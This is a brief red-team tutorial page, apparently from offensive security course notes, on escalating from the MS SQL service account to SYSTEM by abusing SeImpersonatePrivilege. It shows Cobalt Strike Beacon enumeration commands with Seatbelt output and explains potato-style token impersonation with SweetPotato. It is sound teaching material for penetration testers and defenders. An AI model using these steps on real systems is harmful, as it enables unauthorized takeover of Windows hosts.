MS SQL Privilege Escalation
This instance of SQL is running as NT Service\MSSQLSERVER, which is the default during more modern SQL installations. It has a special type of privilege called SeImpersonatePrivilege, which allows the account to "impersonate a client after authentication".
beacon> getuid
[*] You are NT Service\MSSQLSERVER
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges
====== TokenPrivileges ======
Current Token's Privileges
SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED
[*] Completed collection in 0.037 seconds\
In a nutshell, this privilege allows the user to impersonate a token that it's able to get a handle to. However, since this account is not a local admin, it can't just get a handle to a higher-privileged process (e.g. SYSTEM) already running on the machine. A strategy that many authors have come up with is to force a SYSTEM service to authenticate to a rogue service that the attacker creates. This rogue service is then able to impersonate the SYSTEM service whilst it's trying to authenticate.
SweetPotato has a collection of these various techniques which can be executed via Beacon's execute-assembly command.
\
Last updated